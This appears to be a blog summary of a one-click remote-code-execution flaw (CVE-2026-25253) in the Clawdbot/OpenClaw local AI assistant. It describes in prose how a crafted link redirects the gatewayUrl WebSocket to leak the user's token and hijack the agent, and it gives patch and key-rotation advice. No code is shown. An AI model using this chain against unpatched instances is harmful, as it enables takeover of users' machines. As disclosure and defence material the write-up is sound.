One-click RCE on Clawd/Moltbot in under 2 hours with Hackian

Clawdbot — The former name of an open-source AI assistant project capable of running locally on users' devices (e.g., scheduling appointments, sending messages, automating various tasks, etc.), which gained significant popularity in late 2025 to early 2026.

Vulnerability Found (CVE-2026-25253)

This vulnerability lies in a feature where the app accepts the “gatewayUrl” connection setting from a URL parameter and automatically connects to a WebSocket without verifying the origin or performing proper authentication.

This behavior is the primary cause of authentication token leakage from the user's Local Storage to an attacker’s server, serving as the starting point for a full-scale attack.

Attack Steps (Exploit Chain)

Based on analysis from articles and technical reports: Recon & Web Application Analysis Attackers or scripts (e.g., AI pentester like Hackian mentioned in the article) explore the app and discover WebSocket handling and session token management via client-side JavaScript. Create a Malicious Webpage or URL The webpage embeds JavaScript code to redirect the gatewayUrl parameter to a WebSocket server controlled by the attacker. Victim Clicks the Link When the victim opens the link/webpage in a browser running OpenClaw in the background, the webpage instructs the app to reconnect the WebSocket and send the token. Steal Authentication Token The token stored in Local Storage is sent to the attacker's server via the WebSocket channel without verifying the origin hierarchy. Hijack Session and Reconnect The attacker uses the token to connect to the victim’s Local OpenClaw Gateway, gaining the same privileges as the legitimate user. Execute Malicious Commands (RCE) Once access is obtained, the attacker can execute commands on the victim’s machine, such as disabling the sandbox, modifying configurations, or directly executing unsafe shell commands (RCE).

Why It’s Highly Dangerous No authentication is required before the attack — the victim merely needs to visit the prepared webpage. Attackers can gain high-level control of the system and execute full-scale commands on the victim’s machine.

Prevention and Current Status This vulnerability has been patched in OpenClaw version 2026.1.29 (or later) — users should update immediately. If a link was clicked while running an older version, users should reset tokens and rotate passwords/API keys as the tokens may have already been compromised.

Reference https://ethiack.com/news/blog/one-click-rce-moltbot

Poc Repository

Recommended for you

Blue mind

Blue mind

Discover 'Blue Mind,' the meditative state induced by being near water. Science reveals how water reduces stress, boosts happiness hormones, and restores balance to our busy brains.

The Art of Holding Space: Why Listening Outshines Advice

The Art of Holding Space: Why Listening Outshines Advice

Explore the psychology of active listening and how being a "safe space" can be more effective than offering immediate solutions.

Get to know Zed IDE

Get to know Zed IDE

Get to know Zed IDE – No more Browsers, when the IDE is written in Rust and uses GPU

The Mere Presence Effect

The Mere Presence Effect

The mere presence of other people can change our performance

Soft Skill in AI Era

Soft Skill in AI Era

Discover the 8 essential soft skills that Forbes identifies as irreplaceable in the AI era. Learn why human traits like analytical thinking, adaptability, and empathy are the key to thriving alongside automation in the modern workplace.

The Psychology of Pricing: Why Do Some High-Priced Goods Sell Better?

The Psychology of Pricing: Why Do Some High-Priced Goods Sell Better?

An in-depth look at Premium Pricing strategies and the psychological triggers that transform expensive products into highly coveted items.

What is DeepFace?

What is DeepFace?

DeepFace is a Face Recognition & Face Analysis library designed to make working with "faces" using Deep Learning simple and systematic.

Doom Scrolling

Doom Scrolling

Doom scrolling is the behavior of continuously scrolling through news or social media

Lynx Cross-Platform

Lynx Cross-Platform

Forget the framework wars for a second. If you care about raw performance and shipping apps that actually fly, you need to check out Lynx. ByteDance built this beast because they needed TikTok to be instant, and existing tools just weren't cutting it.

Transactional Model of Stress

Transactional Model of Stress

stress does not come directly from events themselves

The Japanese Art of Saving Money

The Japanese Art of Saving Money

The Japanese Art of Saving Money—It’s Not About Deprivation, It’s About "Awareness"

Antigravity Awesome Skills

Antigravity Awesome Skills

Antigravity Awesome Skills, What is it? What is it used for? What are its advantages?

What is Papermerge-Core

What is Papermerge-Core

Papermerge-Core is an open-source Document Management System (DMS) built for storing, OCR processing, and searching scanned documents.

Chronotype

Chronotype

body’s internal biological clock pattern that determines when you naturally wake up, feel sleepy, have energy, and focus best during the day.

What is decision Log.

What is decision Log.

record the reasoning behind decisions, not just the outcomes